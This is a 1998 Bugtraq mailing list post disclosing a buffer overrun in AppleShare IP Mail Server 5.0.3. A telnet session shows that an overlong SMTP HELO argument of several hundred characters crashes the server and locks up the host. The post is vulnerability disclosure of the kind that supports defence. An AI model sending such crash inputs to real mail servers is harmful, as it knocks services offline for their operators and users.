Bugtraq mailing list archives
AppleShare IP Mail Server
From: chris () CYBERNET CO NZ (Chris Wedgwood)
Date: Wed, 8 Apr 1998 13:11:17 +1200
[Yet another buffer overrun? - I hope this isn't getting monotonous] I noticed this a while back but haven't seen any else mention it. There appears to be what looks like a buffer overrun problem with AppleShare IP Mail Server. If you connect to the SMTP port and issue a long string (say 500 bytes or so) the server crashes - and because its a Mac, it usually crashed the whole machine to the point where it needs a reboot. So far I've only tested against servers which emit the banner 'AppleShare IP Mail Server 5.0.3' For example: $ telnet some.where Trying 1.2.3.4... Connected to some.where. Escape character is '^]'. 220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX [ and it just hangs ] $ ping some.where [ ...nothing... ] Physically checking the machine shows it has `locked up' and it a reboot. I assume if you can cause a crash without the lockup then you might be able to execute code and so something useful (on a Mac?). -cw
Current thread:
- SGI O2 ipx security issue, (continued)
- SGI O2 ipx security issue Fabrice Planchon (Apr 08)
- BIND vulnerability test program.. Joshua J. Drake (Apr 09)
- (Q) Sun Rpcbind problem. Chiaki Ishikawa (Apr 10)
- Re: (Q) Sun Rpcbind problem. Casper Dik (Apr 10)
- Wietse's RPCBIND Wietse Venema (Apr 10)
- announce: weaken for netscape !! (fwd) Ken Williams (Apr 10)
- Communicator exploits Fernand Portela (Apr 10)
- Sun rpcbind Nicolas Dubee (Apr 10)
- Re: Sun rpcbind Aaron Bornstein (Apr 10)
- QW vulnerability Glenn F. Maynard (Apr 07)
- AppleShare IP Mail Server Chris Wedgwood (Apr 07)
- Re: AppleShare IP Mail Server David Luyer (Apr 07)
- Re: AppleShare IP Mail Server James W. Abendschan (Apr 07)
- Re: Geac ADVANCE library system security HOLE Damian Kelly (Apr 03)
- Announce : Nessus Alpha 1 Renaud Deraison (Apr 04)
- mailrc and pine security holes Michal Zalewski (Apr 05)
- ICQ Spoofer Seth McGann (Apr 05)